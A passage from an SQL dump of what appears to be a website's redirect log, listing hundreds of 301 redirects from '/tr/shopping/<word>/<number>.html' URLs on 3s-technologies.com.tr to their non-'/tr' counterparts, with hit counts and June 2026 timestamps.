00:00:00',301),(67764,'https://3s-technologies.com.tr/tr/shopping/virtually/214861870.html',NULL,'https://3s-technologies.com.tr/shopping/virtually/214861870.html','',1,0,'2026-06-10 23:34:21','0000-00-00 00:00:00',301),(67765,'https://3s-technologies.com.tr/tr/shopping/example/1718544938.html',NULL,'https://3s-technologies.com.tr/shopping/example/1718544938.html','',1,0,'2026-06-10 23:34:24','0000-00-00 00:00:00',301),(67766,'http://3s-technologies.com.tr/tr/shopping/ahain/585242999.html',NULL,'','',2,0,'2026-06-10 23:34:27','0000-00-00 00:00:00',301),(67767,'https://3s-technologies.com.tr/tr/shopping/devoid/2792589968.html',NULL,'https://3s-technologies.com.tr/shopping/devoid/2792589968.html','',1,0,'2026-06-10 23:34:28','0000-00-00 00:00:00',301),(67768,'https://3s-technologies.com.tr/tr/shopping/invocation/2583579453.html',NULL,'https://3s-technologies.com.tr/shopping/invocation/2583579453.html','',1,0,'2026-06-10 23:34:31','0000-00-00 00:00:00',301),(67769,'https://3s-technologies.com.tr/tr/shopping/constipating/402802004.html',NULL,'https://3s-technologies.com.tr/shopping/constipating/402802004.html','',1,0,'2026-06-10 23:34:33','0000-00-00 00:00:00',301),(67770,'https://3s-technologies.com.tr/tr/shopping/frying/386964458.html',NULL,'https://3s-technologies.com.tr/shopping/frying/386964458.html','',1,0,'2026-06-10 23:34:36','0000-00-00 00:00:00',301),(67771,'https://3s-technologies.com.tr/tr/shopping/bindingly/3738893516.html',NULL,'https://3s-technologies.com.tr/shopping/bindingly/3738893516.html','',1,0,'2026-06-10 23:34:39','0000-00-00 00:00:00',301),(67772,'https://3s-technologies.com.tr/tr/shopping/patchy/1808320709.html',NULL,'https://3s-technologies.com.tr/shopping/patchy/1808320709.html','',1,0,'2026-06-10 23:34:43','0000-00-00 00:00:00',301),(67773,'https://3s-technologies.com.tr/tr/shopping/diffract/723492199.html',NULL,'https://3s-technologies.com.tr/shopping/diffract/723492199.html','',1,0,'2026-06-10 23:34:45','0000-00-00 00:00:00',301),(67774,'https://3s-technologies.com.tr/tr/shopping/returning/178037833.html',NULL,'https://3s-technologies.com.tr/shopping/returning/178037833.html','',1,0,'2026-06-10 23:34:49','0000-00-00 00:00:00',301),(67775,'https://3s-technologies.com.tr/tr/shopping/paniculate/3523588559.html',NULL,'https://3s-technologies.com.tr/shopping/paniculate/3523588559.html','',1,0,'2026-06-10 23:34:51','0000-00-00 00:00:00',301),(67776,'https://3s-technologies.com.tr/tr/shopping/spinet/3649813289.html',NULL,'https://3s-technologies.com.tr/shopping/spinet/3649813289.html','',1,0,'2026-06-10 23:34:54','0000-00-00 00:00:00',301),(67777,'https://3s-technologies.com.tr/tr/shopping/rendering/1545445902.html',NULL,'https://3s-technologies.com.tr/shopping/rendering/1545445902.html','',1,0,'2026-06-10 23:34:58','0000-00-00 00:00:00',301),(67778,'https://3s-technologies.com.tr/tr/shopping/plotus/3437794427.html',NULL,'https://3s-technologies.com.tr/shopping/plotus/3437794427.html','',1,0,'2026-06-10 23:35:00','0000-00-00 00:00:00',301),(67779,'https://3s-technologies.com.tr/tr/shopping/pictorially/2921671823.html',NULL,'https://3s-technologies.com.tr/shopping/pictorially/2921671823.html','',1,0,'2026-06-10 23:35:05','0000-00-00 00:00:00',301),(67780,'https://3s-technologies.com.tr/tr/shopping/naught/3730302756.html',NULL,'https://3s-technologies.com.tr/shopping/naught/3730302756.html','',1,0,'2026-06-10 23:35:08','0000-00-00 00:00:00',301),(67781,'https://3s-technologies.com.tr/tr/shopping/musaceae/3682877059.html',NULL,'https://3s-technologies.com.tr/shopping/musaceae/3682877059.html','',1,0,'2026-06-10 23:35:11','0000-00-00 00:00:00',301),(67782,'https://3s-technologies.com.tr/tr/shopping/catadioptrics/1652609969.html',NULL,'https://3s-technologies.com.tr/shopping/catadioptrics/1652609969.html','',1,0,'2026-06-10 23:35:14','0000-00-00 00:00:00',301),(67783,'https://3s-technologies.com.tr/tr/shopping/pangful/1363646142.html',NULL,'https://3s-technologies.com.tr/shopping/pangful/1363646142.html','',1,0,'2026-06-10 23:35:17','0000-00-00 00:00:00',301),(67784,'https://3s-technologies.com.tr/tr/shopping/jimmying/2324039433.html',NULL,'https://3s-technologies.com.tr/shopping/jimmying/2324039433.html','',1,0,'2026-06-10 23:35:20','0000-00-00 00:00:00',301),(67785,'https://3s-technologies.com.tr/tr/shopping/pleurodynia/2871918013.html',NULL,'https://3s-technologies.com.tr/shopping/pleurodynia/2871918013.html','',1,0,'2026-06-10 23:35:23','0000-00-00 00:00:00',301),(67786,'https://3s-technologies.com.tr/tr/shopping/fasciculatum/1331638120.html',NULL,'https://3s-technologies.com.tr/shopping/fasciculatum/1331638120.html','',1,0,'2026-06-10 23:35:26','0000-00-00 00:00:00',301),(67787,'https://3s-technologies.com.tr/tr/shopping/reapparel/1114168589.html',NULL,'https://3s-technologies.com.tr/shopping/reapparel/1114168589.html','',1,0,'2026-06-10 23:35:29','0000-00-00 00:00:00',301),(67788,'https://3s-technologies.com.tr/tr/shopping/chaffing/788781815.html',NULL,'https://3s-technologies.com.tr/shopping/chaffing/788781815.html','',1,0,'2026-06-10 23:35:34','0000-00-00 00:00:00',301),(67789,'https://3s-technologies.com.tr/tr/shopping/lovingly/2412427125.html',NULL,'https://3s-technologies.com.tr/shopping/lovingly/2412427125.html','',1,0,'2026-06-10 23:35:38','0000-00-00 00:00:00',301),(67790,'https://3s-technologies.com.tr/tr/shopping/intermediately/2041309981.html',NULL,'https://3s-technologies.com.tr/shopping/intermediately/2041309981.html','',1,0,'2026-06-10 23:35:42','0000-00-00 00:00:00',301),(67791,'https://3s-technologies.com.tr/tr/shopping/openwork/564346889.html',NULL,'https://3s-technologies.com.tr/shopping/openwork/564346889.html','',1,0,'2026-06-10 23:35:45','0000-00-00 00:00:00',301),(67792,'https://3s-technologies.com.tr/tr/shopping/plaguing/1485773548.html',NULL,'https://3s-technologies.com.tr/shopping/plaguing/1485773548.html','',1,0,'2026-06-10 23:35:47','0000-00-00 00:00:00',301),(67793,'https://3s-technologies.com.tr/tr/shopping/improportionable/1422568141.html',NULL,'https://3s-technologies.com.tr/shopping/improportionable/1422568141.html','',1,0,'2026-06-10 23:35:52','0000-00-00 00:00:00',301),(67794,'https://3s-technologies.com.tr/tr/shopping/spectrographically/946091780.html',NULL,'https://3s-technologies.com.tr/shopping/spectrographically/946091780.html','',1,0,'2026-06-10 23:35:54','0000-00-00 00:00:00',301),(67795,'https://3s-technologies.com.tr/tr/shopping/conversible/278808229.html',NULL,'https://3s-technologies.com.tr/shopping/conversible/278808229.html','',1,0,'2026-06-10 23:35:57','0000-00-00 00:00:00',301),(67796,'https://3s-technologies.com.tr/tr/shopping/imbordered/3671920670.html',NULL,'https://3s-technologies.com.tr/shopping/imbordered/3671920670.html','',1,0,'2026-06-10 23:36:00','0000-00-00 00:00:00',301),(67797,'https://3s-technologies.com.tr/tr/shopping/declassify/3780680398.html',NULL,'https://3s-technologies.com.tr/shopping/declassify/3780680398.html','',1,0,'2026-06-10 23:36:03','0000-00-00 00:00:00',301),(67798,'https://3s-technologies.com.tr/tr/shopping/understudy/3533507103.html',NULL,'https://3s-technologies.com.tr/shopping/understudy/3533507103.html','',1,0,'2026-06-10 23:36:06','0000-00-00 00:00:00',301),(67799,'https://3s-technologies.com.tr/tr/shopping/misperception/970805162.html',NULL,'https://3s-technologies.com.tr/shopping/misperception/970805162.html','',1,0,'2026-06-10 23:36:09','0000-00-00 00:00:00',301),(67800,'https://3s-technologies.com.tr/tr/shopping/fooling/3765144592.html',NULL,'https://3s-technologies.com.tr/shopping/fooling/3765144592.html','',1,0,'2026-06-10 23:36:12','0000-00-00 00:00:00',301),(67801,'https://3s-technologies.com.tr/tr/shopping/pathologic/574688973.html',NULL,'https://3s-technologies.com.tr/shopping/pathologic/574688973.html','',1,0,'2026-06-10 23:36:15','0000-00-00 00:00:00',301),(67802,'https://3s-technologies.com.tr/tr/shopping/systemize/3298746206.html',NULL,'https://3s-technologies.com.tr/shopping/systemize/3298746206.html','',1,0,'2026-06-10 23:36:19','0000-00-00 00:00:00',301),(67803,'https://3s-technologies.com.tr/tr/shopping/copesmate/57747809.html',NULL,'https://3s-technologies.com.tr/shopping/copesmate/57747809.html','',1,0,'2026-06-10 23:36:21','0000-00-00 00:00:00',301),(67804,'https://3s-technologies.com.tr/tr/shopping/externality/3587242536.html',NULL,'https://3s-technologies.com.tr/shopping/externality/3587242536.html','',1,0,'2026-06-10 23:36:24','0000-00-00 00:00:00',301),(67805,'https://3s-technologies.com.tr/tr/shopping/accommodating/2570949189.html',NULL,'https://3s-technologies.com.tr/shopping/accommodating/2570949189.html','',1,0,'2026-06-10 23:36:27','0000-00-00 00:00:00',301),(67806,'https://3s-technologies.com.tr/tr/shopping/perceptivity/2931003535.html',NULL,'https://3s-technologies.com.tr/shopping/perceptivity/2931003535.html','',1,0,'2026-06-10 23:36:30','0000-00-00 00:00:00',301),(67807,'https://3s-technologies.com.tr/tr/shopping/bantingism/17516901.html',NULL,'https://3s-technologies.com.tr/shopping/bantingism/17516901.html','',1,0,'2026-06-10 23:36:33','0000-00-00 00:00:00',301),(67808,'https://3s-technologies.com.tr/tr/shopping/gluttonizing/2350070588.html',NULL,'https://3s-technologies.com.tr/shopping/gluttonizing/2350070588.html','',1,0,'2026-06-10 23:36:36','0000-00-00 00:00:00',301),(67809,'https://3s-technologies.com.tr/tr/shopping/objuration/3366232777.html',NULL,'https://3s-technologies.com.tr/shopping/objuration/3366232777.html','',1,0,'2026-06-10 23:36:39','0000-00-00 00:00:00',301),(67810,'https://3s-technologies.com.tr/tr/shopping/microvolt/424138697.html',NULL,'https://3s-technologies.com.tr/shopping/microvolt/424138697.html','',1,0,'2026-06-10 23:36:42','0000-00-00 00:00:00',301),(67811,'https://3s-technologies.com.tr/tr/shopping/parallel/879980831.html',NULL,'https://3s-technologies.com.tr/shopping/parallel/879980831.html','',1,0,'2026-06-10 23:36:45','0000-00-00 00:00:00',301),(67812,'http://3s-technologies.com.tr/tr/shopping/microcline/1755142592.html',NULL,'','',1,0,'2026-06-10 23:36:47','0000-00-00 00:00:00',301),(67813,'https://3s-technologies.com.tr/tr/shopping/dotish/3786644792.html',NULL,'https://3s-technologies.com.tr/shopping/dotish/3786644792.html','',1,0,'2026-06-10 23:36:48','0000-00-00 00:00:00',301),(67814,'http://3s-technologies.com.tr/tr/shopping/election/17517761.html',NULL,'','',2,0,'2026-06-10 23:36:50','0000-00-00 00:00:00',301),(67815,'https://3s-technologies.com.tr/tr/shopping/interpretatively/33823379.html',NULL,'https://3s-technologies.com.tr/shopping/interpretatively/33823379.html','',1,0,'2026-06-10 23:36:51','0000-00-00 00:00:00',301),(67816,'https://3s-technologies.com.tr/tr/shopping/scriptoria/4158093416.html',NULL,'https://3s-technologies.com.tr/shopping/scriptoria/4158093416.html','',1,0,'2026-06-10 23:36:54','0000-00-00 00:00:00',301),(67817,'http://3s-technologies.com.tr/tr/shopping/baloghia/2753572003.html',NULL,'','',1,0,'2026-06-10 23:36:55','0000-00-00 00:00:00',301),(67818,'http://3s-technologies.com.tr/tr/shopping/incommodities/1915827031.html',NULL,'','',2,0,'2026-06-10 23:36:57','0000-00-00 00:00:00',301),(67819,'https://3s-technologies.com.tr/tr/shopping/capitulation/818461724.html',NULL,'https://3s-technologies.com.tr/shopping/capitulation/818461724.html','',1,0,'2026-06-10 23:36:58','0000-00-00 00:00:00',301),(67820,'https://3s-technologies.com.tr/tr/shopping/eulogically/3330588474.html',NULL,'https://3s-technologies.com.tr/shopping/eulogically/3330588474.html','',1,0,'2026-06-10 23:37:01','0000-00-00 00:00:00',301),(67821,'http://3s-technologies.com.tr/tr/shopping/excommunicant/520714114.html',NULL,'','',2,0,'2026-06-10 23:37:02','0000-00-00 00:00:00',301),(67822,'https://3s-technologies.com.tr/tr/shopping/jerrybuilt/1752977142.html',NULL,'https://3s-technologies.com.tr/shopping/jerrybuilt/1752977142.html','',1,0,'2026-06-10 23:37:04','0000-00-00 00:00:00',301),(67823,'http://3s-technologies.com.tr/tr/shopping/apocodeine/1215652636.html',NULL,'','',1,0,'2026-06-10 23:37:05','0000-00-00 00:00:00',301),(67824,'https://3s-technologies.com.tr/tr/shopping/solicitation/1305654774.html',NULL,'https://3s-technologies.com.tr/shopping/solicitation/1305654774.html','',1,0,'2026-06-10 23:37:08','0000-00-00 00:00:00',301),(67825,'https://3s-technologies.com.tr/tr/shopping/imperscrutable/1130253679.html',NULL,'https://3s-technologies.com.tr/shopping/imperscrutable/1130253679.html','',1,0,'2026-06-10 23:37:11','0000-00-00 00:00:00',301),(67826,'https://3s-technologies.com.tr/tr/shopping/lowlying/3213371948.html',NULL,'https://3s-technologies.com.tr/shopping/lowlying/3213371948.html','',1,0,'2026-06-10 23:37:14','0000-00-00 00:00:00',301),(67827,'https://3s-technologies.com.tr/tr/shopping/sidled/93196208.html',NULL,'https://3s-technologies.com.tr/shopping/sidled/93196208.html','',1,0,'2026-06-10 23:37:17','0000-00-00 00:00:00',301),(67828,'https://3s-technologies.com.tr/tr/shopping/subjunction/176825734.html',NULL,'https://3s-technologies.com.tr/shopping/subjunction/176825734.html','',1,0,'2026-06-10 23:37:20','0000-00-00 00:00:00',301),(67829,'https://3s-technologies.com.tr/tr/shopping/supernova/1065215129.html',NULL,'https://3s-technologies.com.tr/shopping/supernova/1065215129.html','',1,0,'2026-06-10 23:37:23','0000-00-00 00:00:00',301),(67830,'https://3s-technologies.com.tr/tr/shopping/cracker/2714927906.html',NULL,'https://3s-technologies.com.tr/shopping/cracker/2714927906.html','',1,0,'2026-06-10 23:37:26','0000-00-00 00:00:00',301),(67831,'https://3s-technologies.com.tr/tr/shopping/amnigenous/479693410.html',NULL,'https://3s-technologies.com.tr/shopping/amnigenous/479693410.html','',1,0,'2026-06-10 23:37:29','0000-00-00 00:00:00',301),(67832,'https://3s-technologies.com.tr/tr/shopping/foreandaft/2409050436.html',NULL,'https://3s-technologies.com.tr/shopping/foreandaft/2409050436.html','',1,0,'2026-06-10 23:37:32','0000-00-00 00:00:00',301),(67833,'https://3s-technologies.com.tr/tr/shopping/captiving/3100049486.html',NULL,'https://3s-technologies.com.tr/shopping/captiving/3100049486.html','',1,0,'2026-06-10 23:37:35','0000-00-00 00:00:00',301),(67834,'https://3s-technologies.com.tr/tr/shopping/effluviable/145146989.html',NULL,'https://3s-technologies.com.tr/shopping/effluviable/145146989.html','',1,0,'2026-06-10 23:37:38','0000-00-00 00:00:00',301),(67835,'https://3s-technologies.com.tr/tr/shopping/mitigative/1681065290.html',NULL,'https://3s-technologies.com.tr/shopping/mitigative/1681065290.html','',1,0,'2026-06-10 23:37:41','0000-00-00 00:00:00',301),(67836,'https://3s-technologies.com.tr/tr/shopping/scleroderma/3202588437.html',NULL,'https://3s-technologies.com.tr/shopping/scleroderma/3202588437.html','',1,0,'2026-06-10 23:37:44','0000-00-00 00:00:00',301),(67837,'https://3s-technologies.com.tr/tr/shopping/perception/2514409620.html',NULL,'https://3s-technologies.com.tr/shopping/perception/2514409620.html','',1,0,'2026-06-10 23:37:47','0000-00-00 00:00:00',301),(67838,'https://3s-technologies.com.tr/tr/shopping/writative/3875090365.html',NULL,'https://3s-technologies.com.tr/shopping/writative/3875090365.html','',1,0,'2026-06-10 23:37:50','0000-00-00 00:00:00',301),(67839,'https://3s-technologies.com.tr/tr/shopping/stibine/3289568614.html',NULL,'https://3s-technologies.com.tr/shopping/stibine/3289568614.html','',1,0,'2026-06-10 23:37:53','0000-00-00 00:00:00',301),(67840,'https://3s-technologies.com.tr/tr/shopping/mersion/2106436058.html',NULL,'https://3s-technologies.com.tr/shopping/mersion/2106436058.html','',1,0,'2026-06-10 23:37:56','0000-00-00 00:00:00',301),(67841,'https://3s-technologies.com.tr/tr/shopping/subside/3154046726.html',NULL,'https://3s-technologies.com.tr/shopping/subside/3154046726.html','',1,0,'2026-06-10 23:37:59','0000-00-00 00:00:00',301),(67842,'https://3s-technologies.com.tr/tr/shopping/reddle/3154392068.html',NULL,'https://3s-technologies.com.tr/shopping/reddle/3154392068.html','',1,0,'2026-06-10 23:38:02','0000-00-00 00:00:00',301),(67843,'https://3s-technologies.com.tr/tr/shopping/vampire/3835022980.html',NULL,'https://3s-technologies.com.tr/shopping/vampire/3835022980.html','',1,0,'2026-06-10 23:38:05','0000-00-00 00:00:00',301),(67844,'https://3s-technologies.com.tr/tr/shopping/rawhead/284772655.html',NULL,'https://3s-technologies.com.tr/shopping/rawhead/284772655.html','',1,0,'2026-06-10 23:38:08','0000-00-00 00:00:00',301),(67845,'https://3s-technologies.com.tr/tr/shopping/gracility/68482810.html',NULL,'https://3s-technologies.com.tr/shopping/gracility/68482810.html','',1,0,'2026-06-10 23:38:11','0000-00-00 00:00:00',301),(67846,'https://3s-technologies.com.tr/tr/shopping/argentina/2586429707.html',NULL,'https://3s-technologies.com.tr/shopping/argentina/2586429707.html','',1,0,'2026-06-10 23:38:18','0000-00-00 00:00:00',301),(67847,'https://3s-technologies.com.tr/tr/shopping/unbed/2341886284.html',NULL,'https://3s-technologies.com.tr/shopping/unbed/2341886284.html','',1,0,'2026-06-10 23:38:20','0000-00-00 00:00:00',301),(67848,'https://3s-technologies.com.tr/tr/shopping/riverhood/1733418291.html',NULL,'https://3s-technologies.com.tr/shopping/riverhood/1733418291.html','',1,0,'2026-06-10 23:38:23','0000-00-00 00:00:00',301),(67849,'https://3s-technologies.com.tr/tr/shopping/indorser/2963397664.html',NULL,'https://3s-technologies.com.tr/shopping/indorser/2963397664.html','',1,0,'2026-06-10 23:38:27','0000-00-00 00:00:00',301),(67850,'https://3s-technologies.com.tr/tr/shopping/famously/3292378935.html',NULL,'https://3s-technologies.com.tr/shopping/famously/3292378935.html','',1,0,'2026-06-10 23:38:29','0000-00-00 00:00:00',301),(67851,'https://3s-technologies.com.tr/tr/shopping/lewdness/1693447023.html',NULL,'https://3s-technologies.com.tr/shopping/lewdness/1693447023.html','',1,0,'2026-06-10 23:38:33','0000-00-00 00:00:00',301),(67852,'https://3s-technologies.com.tr/tr/shopping/unspar/2290313210.html',NULL,'https://3s-technologies.com.tr/shopping/unspar/2290313210.html','',1,0,'2026-06-10 23:38:35','0000-00-00 00:00:00',301),(67853,'https://3s-technologies.com.tr/tr/shopping/plutonic/2918623392.html',NULL,'https://3s-technologies.com.tr/shopping/plutonic/2918623392.html','',1,0,'2026-06-10 23:38:38','0000-00-00 00:00:00',301),(67854,'https://3s-technologies.com.tr/tr/shopping/dissimilation/4104829431.html',NULL,'https://3s-technologies.com.tr/shopping/dissimilation/4104829431.html','',1,0,'2026-06-10 23:38:42','0000-00-00 00:00:00',301),(67855,'https://3s-technologies.com.tr/tr/shopping/kaxes/3565175968.html',NULL,'https://3s-technologies.com.tr/shopping/kaxes/3565175968.html','',1,0,'2026-06-10 23:38:44','0000-00-00 00:00:00',301),(67856,'https://3s-technologies.com.tr/tr/shopping/fluxibility/1159498330.html',NULL,'https://3s-technologies.com.tr/shopping/fluxibility/1159498330.html','',1,0,'2026-06-10 23:38:48','0000-00-00 00:00:00',301),(67857,'https://3s-technologies.com.tr/tr/shopping/thridded/1517137004.html',NULL,'https://3s-technologies.com.tr/shopping/thridded/1517137004.html','',1,0,'2026-06-10 23:38:50','0000-00-00 00:00:00',301),(67858,'http://3s-technologies.com.tr/tr/shopping/shash/1112294503.html',NULL,'','',1,0,'2026-06-10 23:38:54','0000-00-00 00:00:00',301),(67859,'https://3s-technologies.com.tr/tr/shopping/podophyllous/1624684617.html',NULL,'https://3s-technologies.com.tr/shopping/podophyllous/1624684617.html','',1,0,'2026-06-10 23:38:55','0000-00-00 00:00:00',301),(67860,'https://3s-technologies.com.tr/tr/shopping/stretching/1320019278.html',NULL,'https://3s-technologies.com.tr/shopping/stretching/1320019278.html','',1,0,'2026-06-10 23:38:57','0000-00-00 00:00:00',301),(67861,'http://3s-technologies.com.tr/tr/shopping/nakedness/1240366018.html',NULL,'','',2,0,'2026-06-10 23:38:57','0000-00-00 00:00:00',301),(67862,'https://3s-technologies.com.tr/tr/shopping/dresden/1241915789.html',NULL,'https://3s-technologies.com.tr/shopping/dresden/1241915789.html','',1,0,'2026-06-10 23:39:00','0000-00-00 00:00:00',301),(67863,'https://3s-technologies.com.tr/tr/shopping/mukha/3197010150.html',NULL,'https://3s-technologies.com.tr/shopping/mukha/3197010150.html','',1,0,'2026-06-10 23:39:03','0000-00-00 00:00:00',301),(67864,'http://3s-technologies.com.tr/tr/shopping/wakefully/1627676043.html',NULL,'','',2,0,'2026-06-10 23:39:03','0000-00-00 00:00:00',301),(67865,'https://3s-technologies.com.tr/tr/shopping/confine/3180867211.html',NULL,'https://3s-technologies.com.tr/shopping/confine/3180867211.html','',1,0,'2026-06-10 23:39:06','0000-00-00 00:00:00',301),(67866,'http://3s-technologies.com.tr/tr/shopping/doubletonguing/1239153919.html',NULL,'','',1,0,'2026-06-10 23:39:07','0000-00-00 00:00:00',301),(67867,'https://3s-technologies.com.tr/tr/shopping/crossarchus/3197173673.html',NULL,'https://3s-technologies.com.tr/shopping/crossarchus/3197173673.html','',1,0,'2026-06-10 23:39:09','0000-00-00 00:00:00',301),(67868,'http://3s-technologies.com.tr/tr/shopping/buttock/732834158.html',NULL,'','',2,0,'2026-06-10 23:39:09','0000-00-00 00:00:00',301),(67869,'https://3s-technologies.com.tr/tr/shopping/passiontide/1609727723.html',NULL,'https://3s-technologies.com.tr/shopping/passiontide/1609727723.html','',1,0,'2026-06-10 23:39:12','0000-00-00 00:00:00',301),(67870,'http://3s-technologies.com.tr/tr/shopping/frisure/847486834.html',NULL,'','',2,0,'2026-06-10 23:39:14','0000-00-00 00:00:00',301),(67871,'https://3s-technologies.com.tr/tr/shopping/tollerate/1396683441.html',NULL,'https://3s-technologies.com.tr/shopping/tollerate/1396683441.html','',1,0,'2026-06-10 23:39:15','0000-00-00 00:00:00',301),(67872,'https://3s-technologies.com.tr/tr/shopping/navis/2638789534.html',NULL,'https://3s-technologies.com.tr/shopping/navis/2638789534.html','',1,0,'2026-06-10 23:39:18','0000-00-00 00:00:00',301),(67873,'https://3s-technologies.com.tr/tr/shopping/cashbox/3523503551.html',NULL,'https://3s-technologies.com.tr/shopping/cashbox/3523503551.html','',1,0,'2026-06-10 23:39:21','0000-00-00 00:00:00',301),(67874,'https://3s-technologies.com.tr/tr/shopping/eyesore/4126329663.html',NULL,'https://3s-technologies.com.tr/shopping/eyesore/4126329663.html','',1,0,'2026-06-10 23:39:24','0000-00-00 00:00:00',301),(67875,'https://3s-technologies.com.tr/tr/shopping/barathea/1785205565.html',NULL,'https://3s-technologies.com.tr/shopping/barathea/1785205565.html','',1,0,'2026-06-10 23:39:27','0000-00-00 00:00:00',301),(67876,'https://3s-technologies.com.tr/tr/shopping/odontoid/1778240170.html',NULL,'https://3s-technologies.com.tr/shopping/odontoid/1778240170.html','',1,0,'2026-06-10 23:39:30','0000-00-00 00:00:00',301),(67877,'https://3s-technologies.com.tr/tr/shopping/albifacies/2322973789.html',NULL,'https://3s-technologies.com.tr/shopping/albifacies/2322973789.html','',1,0,'2026-06-10 23:39:32','0000-00-00 00:00:00',301),(67878,'https://3s-technologies.com.tr/tr/shopping/louchettes/250890097.html',NULL,'https://3s-technologies.com.tr/shopping/louchettes/250890097.html','',1,0,'2026-06-10 23:39:36','0000-00-00 00:00:00',301),(67879,'https://3s-technologies.com.tr/tr/shopping/culminant/2999665213.html',NULL,'https://3s-technologies.com.tr/shopping/culminant/2999665213.html','',1,0,'2026-06-10 23:39:39','0000-00-00 00:00:00',301),(67880,'https://3s-technologies.com.tr/tr/shopping/butyric/1543225992.html',NULL,'https://3s-technologies.com.tr/shopping/butyric/1543225992.html','',1,0,'2026-06-10 23:39:49','0000-00-00 00:00:00',301),(67881,'https://3s-technologies.com.tr/tr/shopping/patio/1801413211.html',NULL,'https://3s-technologies.com.tr/shopping/patio/1801413211.html','',1,0,'2026-06-10 23:39:53','0000-00-00 00:00:00',301),(67882,'https://3s-technologies.com.tr/tr/shopping/jargonist/2930177543.html',NULL,'https://3s-technologies.com.tr/shopping/jargonist/2930177543.html','',1,0,'2026-06-10 23:39:56','0000-00-00 00:00:00',301),(67883,'https://3s-technologies.com.tr/tr/shopping/slangy/3714159801.html',NULL,'https://3s-technologies.com.tr/shopping/slangy/3714159801.html','',1,0,'2026-06-10 23:39:59','0000-00-00 00:00:00',301),(67884,'https://3s-technologies.com.tr/tr/shopping/obtundent/3984375884.html',NULL,'https://3s-technologies.com.tr/shopping/obtundent/3984375884.html','',1,0,'2026-06-10 23:40:02','0000-00-00 00:00:00',301),(67885,'https://3s-technologies.com.tr/tr/shopping/chickasaw/2084532997.html',NULL,'https://3s-technologies.com.tr/shopping/chickasaw/2084532997.html','',1,0,'2026-06-10 23:40:05','0000-00-00 00:00:00',301),(67886,'https://3s-technologies.com.tr/tr/shopping/presbytery/3138078780.html',NULL,'https://3s-technologies.com.tr/shopping/presbytery/3138078780.html','',1,0,'2026-06-10 23:40:08','0000-00-00 00:00:00',301),(67887,'https://3s-technologies.com.tr/tr/shopping/narcissuses/218901374.html',NULL,'https://3s-technologies.com.tr/shopping/narcissuses/218901374.html','',1,0,'2026-06-10 23:40:11','0000-00-00 00:00:00',301),(67888,'https://3s-technologies.com.tr/tr/shopping/banana/797410123.html',NULL,'https://3s-technologies.com.tr/shopping/banana/797410123.html','',1,0,'2026-06-10 23:40:14','0000-00-00 00:00:00',301),(67889,'https://3s-technologies.com.tr/tr/shopping/earthen/994527833.html',NULL,'https://3s-technologies.com.tr/shopping/earthen/994527833.html','',1,0,'2026-06-10 23:40:17','0000-00-00 00:00:00',301),(67890,'https://3s-technologies.com.tr/tr/shopping/supraocular/1612802208.html',NULL,'https://3s-technologies.com.tr/shopping/supraocular/1612802208.html','',1,0,'2026-06-10 23:40:20','0000-00-00 00:00:00',301),(67891,'https://3s-technologies.com.tr/tr/shopping/gipoun/4116448305.html',NULL,'https://3s-technologies.com.tr/shopping/gipoun/4116448305.html','',1,0,'2026-06-10 23:40:23','0000-00-00 00:00:00',301),(67892,'https://3s-technologies.com.tr/tr/shopping/yellowtailed/4106041530.html',NULL,'https://3s-technologies.com.tr/shopping/yellowtailed/4106041530.html','',1,0,'2026-06-10 23:40:26','0000-00-00 00:00:00',301),(67893,'https://3s-technologies.com.tr/tr/shopping/dispersal/3862381964.html',NULL,'https://3s-technologies.com.tr/shopping/dispersal/3862381964.html','',1,0,'2026-06-10 23:40:29','0000-00-00 00:00:00',301),(67894,'https://3s-technologies.com.tr/tr/shopping/entertissued/2616008553.html',NULL,'https://3s-technologies.com.tr/shopping/entertissued/2616008553.html','',1,0,'2026-06-10 23:40:32','0000-00-00 00:00:00',301),(67895,'https://3s-technologies.com.tr/tr/shopping/droshky/3112200890.html',NULL,'https://3s-technologies.com.tr/shopping/droshky/3112200890.html','',1,0,'2026-06-10 23:40:35','0000-00-00 00:00:00',301),(67896,'https://3s-technologies.com.tr/tr/shopping/princeling/1725961147.html',NULL,'https://3s-technologies.com.tr/shopping/princeling/1725961147.html','',1,0,'2026-06-10 23:40:38','0000-00-00 00:00:00',301),(67897,'https://3s-technologies.com.tr/tr/shopping/poinder/4073823381.html',NULL,'https://3s-technologies.com.tr/shopping/poinder/4073823381.html','',1,0,'2026-06-10 23:40:41','0000-00-00 00:00:00',301),(67898,'https://3s-technologies.com.tr/tr/shopping/endiademed/3207840040.html',NULL,'https://3s-technologies.com.tr/shopping/endiademed/3207840040.html','',1,0,'2026-06-10 23:40:44','0000-00-00 00:00:00',301),(67899,'https://3s-technologies.com.tr/tr/shopping/botanybay/4039556899.html',NULL,'https://3s-technologies.com.tr/shopping/botanybay/4039556899.html','',1,0,'2026-06-10 23:40:47','0000-00-00 00:00:00',301),(67900,'https://3s-technologies.com.tr/tr/shopping/thlaspi/3465471232.html',NULL,'https://3s-technologies.com.tr/shopping/thlaspi/3465471232.html','',1,0,'2026-06-10 23:40:50','0000-00-00 00:00:00',301),(67901,'https://3s-technologies.com.tr/tr/shopping/misdealing/3115854287.html',NULL,'https://3s-technologies.com.tr/shopping/misdealing/3115854287.html','',1,0,'2026-06-10 23:40:53','0000-00-00 00:00:00',301),(67902,'https://3s-technologies.com.tr/tr/shopping/parasphenoid/1201893812.html',NULL,'https://3s-technologies.com.tr/shopping/parasphenoid/1201893812.html','',1,0,'2026-06-10 23:40:58','0000-00-00 00:00:00',301),(67903,'https://3s-technologies.com.tr/tr/shopping/herbist/1088407827.html',NULL,'https://3s-technologies.com.tr/shopping/herbist/1088407827.html','',1,0,'2026-06-10 23:41:00','0000-00-00 00:00:00',301),(67904,'https://3s-technologies.com.tr/tr/shopping/chiasmicadj/576287195.html',NULL,'https://3s-technologies.com.tr/shopping/chiasmicadj/576287195.html','',1,0,'2026-06-10 23:41:03','0000-00-00 00:00:00',301),(67905,'https://3s-technologies.com.tr/tr/shopping/lifesomeness/3671094678.html',NULL,'https://3s-technologies.com.tr/shopping/lifesomeness/3671094678.html','',1,0,'2026-06-10 23:41:06','0000-00-00 00:00:00',301),(67906,'http://3s-technologies.com.tr/tr/shopping/huswifely/109503514.html',NULL,'','',1,0,'2026-06-10 23:41:08','0000-00-00 00:00:00',301),(67907,'https://3s-technologies.com.tr/tr/shopping/salvationist/52169522.html',NULL,'https://3s-technologies.com.tr/shopping/salvationist/52169522.html','',1,0,'2026-06-10 23:41:09','0000-00-00 00:00:00',301),(67908,'http://3s-technologies.com.tr/tr/shopping/exibit/1756518198.html',NULL,'','',2,0,'2026-06-10 23:41:12','0000-00-00 